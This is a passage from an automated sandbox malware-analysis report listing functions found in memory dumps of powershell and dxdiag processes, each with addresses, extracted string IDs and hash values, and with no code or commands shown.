                          • Instruction ID: 639a589a1b84e1546e50e46f253513b1eb6718b18691ca182a3a14012882fc08
                          • Opcode Fuzzy Hash: 4aa6c32d41269a544d29897e087fa2d67bdc09a1a89b292f29cb49271ba2f407
                          • Instruction Fuzzy Hash: 7BA157B1704306AFCB254B79985076ABBA5FFC2294F1488AAF505CB653DF31CC61C7A2
                          Function 07747F48 Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$tPsq$$sq$$sq$$sq
                          • API String ID: 0-1201611515
                          • Opcode ID: b6fbaa00ec37985079df0bac1d41ac7620cdaa130973faec95370c7e517898f9
                          • Instruction ID: 8dccdff1e87d512e14965f0cd4aac2bb54d8fd415f8756a205916bf54c1b0964
                          • Opcode Fuzzy Hash: b6fbaa00ec37985079df0bac1d41ac7620cdaa130973faec95370c7e517898f9
                          • Instruction Fuzzy Hash: 749127F0B0420ADFDB24CF68C544B6AB7F2AF85394F19C86AE9159B251DB31D840CB93
                          Function 0774D904 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$tPsq$$sq$$sq$$sq
                          • API String ID: 0-111563546
                          • Opcode ID: 918075b316bc3eb496106a37a01538fe133a21650d198e97f25002703419a83a
                          • Instruction ID: 35f88d2c970445dcbb088a03cc55dcfbecce7ec98fd47816388ae4ed0e71be75
                          • Opcode Fuzzy Hash: 918075b316bc3eb496106a37a01538fe133a21650d198e97f25002703419a83a
                          • Instruction Fuzzy Hash: 1F61D7F1708206EFDF348E14C5447BAB7A1BF46391F5984A6EA859B291C771DC80CB91
                          Function 07741DD0 Relevance: 6.4, Strings: 5, Instructions: 139COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$$sq$$sq$$sq
                          • API String ID: 0-737313894
                          • Opcode ID: e792912c0c80541b0f1737ef19f62989ab5b74aa215569dc62d81dea5970b34b
                          • Instruction ID: b4af62f61a4d859be67d9dab7fb9036ac8b88d63cbcec3f14f82a22576139c32
                          • Opcode Fuzzy Hash: e792912c0c80541b0f1737ef19f62989ab5b74aa215569dc62d81dea5970b34b
                          • Instruction Fuzzy Hash: 584188F970425E9BCB2876B9445037AFB96AFC6251FA4896AD5018B282DF31CCD2C352
                          Function 077441FD Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$$sq$$sq$$sq
                          • API String ID: 0-737313894
                          • Opcode ID: c825c9b6920f9bd2e8c88d00539cec8383f743d1c52273097f78f9b0567595ea
                          • Instruction ID: 5541d1cd5cca6959b7a6b4373cd1d7539c5f406946f519876d68fef17f2cc937
                          • Opcode Fuzzy Hash: c825c9b6920f9bd2e8c88d00539cec8383f743d1c52273097f78f9b0567595ea
                          • Instruction Fuzzy Hash: 04313BB67082D7CFDF294AA5984037AFBA2FFC62D1B24887AD9018B541DF31C841E752
                          Function 077400F0 Relevance: 5.5, Strings: 4, Instructions: 458COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$tPsq$tPsq
                          • API String ID: 0-3536429623
                          • Opcode ID: 2187145af337983e490bd17bd1dd0bb8cdaee8be1ae6463c966db0c7782fd24c
                          • Instruction ID: 68d2a219fd49351b0c04051685a41f0b40db7b44aa487f4e8413143e8df89a09
                          • Opcode Fuzzy Hash: 2187145af337983e490bd17bd1dd0bb8cdaee8be1ae6463c966db0c7782fd24c
                          • Instruction Fuzzy Hash: 74E139F1B143068FCB249BBC8455A6ABBB2AFC6394F1488FAD605DB291DB35C841C761
                          Function 0774DCE0 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: XRxq$XRxq$tPsq$$sq
                          • API String ID: 0-365657811
                          • Opcode ID: 990e9972fb25bb7bbd857c0e4d02902732e38be51f3dfd33b5739d872221ed5c
                          • Instruction ID: fa5727ac5f6b6fd0921ff983bc180146c9adbe994c34580d43d5ac86952c5c8c
                          • Opcode Fuzzy Hash: 990e9972fb25bb7bbd857c0e4d02902732e38be51f3dfd33b5739d872221ed5c
                          • Instruction Fuzzy Hash: AE418EB0B00215DBCB38CE49C144AA9F7F2AF89350F19C4AAE695AB251C731DD40CF90
                          Function 07741C10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $sq$$sq$$sq$$sq
                          • API String ID: 0-2855845837
                          • Opcode ID: 404ab017e8fd21777b6b2e6cacaa57f1156e8742889e2207b878552f746f37fc
                          • Instruction ID: 44e0e26e6f40d395cc2efe84d9e939db44f8fabefc5ea93cef7efac06210385c
                          • Opcode Fuzzy Hash: 404ab017e8fd21777b6b2e6cacaa57f1156e8742889e2207b878552f746f37fc
                          • Instruction Fuzzy Hash: 9D2129B171434AABDB3466BA9C41727B6969FC1355FA4883A9505CB381DF35C881C361
                          Function 07741A91 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$$sq$$sq
                          • API String ID: 0-148891389
                          • Opcode ID: 9466356cbea5fbaa106ed6c79a88b1f581d4d0914f1758398b9da160e126b98f
                          • Instruction ID: 5e88f373b75beb8da649cafca81fcd550cb0888dfe259d112ce0941fc2dcade1
                          • Opcode Fuzzy Hash: 9466356cbea5fbaa106ed6c79a88b1f581d4d0914f1758398b9da160e126b98f
                          • Instruction Fuzzy Hash: 6601F26271D3D95FC32B137C2821666AF726FC3594B6A00DBC181DF293DE558C85C3A6

                          Non-executed Functions

                          Function 05FA2847 Relevance: 10.5, Strings: 8, Instructions: 465COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000003.2523490234.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, Offset: 05F9D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_3_5f63000_dxdiag.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,k@$@k@$Xk@$dk@$|k@$j@$k@$k@
                          • API String ID: 0-3265782996
                          • Opcode ID: 9c9890f5f82be9e1f6e59d34f7c463733dfa56d4e4441587a7d29c1599ec789a
                          • Instruction ID: 9c8fa15238e6b532ee23dc4f0907f6b53255be1680c0bc51e8b2baa7ac42cd09
                          • Opcode Fuzzy Hash: 9c9890f5f82be9e1f6e59d34f7c463733dfa56d4e4441587a7d29c1599ec789a
                          • Instruction Fuzzy Hash: 3C027DB6B04225CBEB24DB54CD84B9977B6FF04310F1580FAE509A7291CB78AE90CF56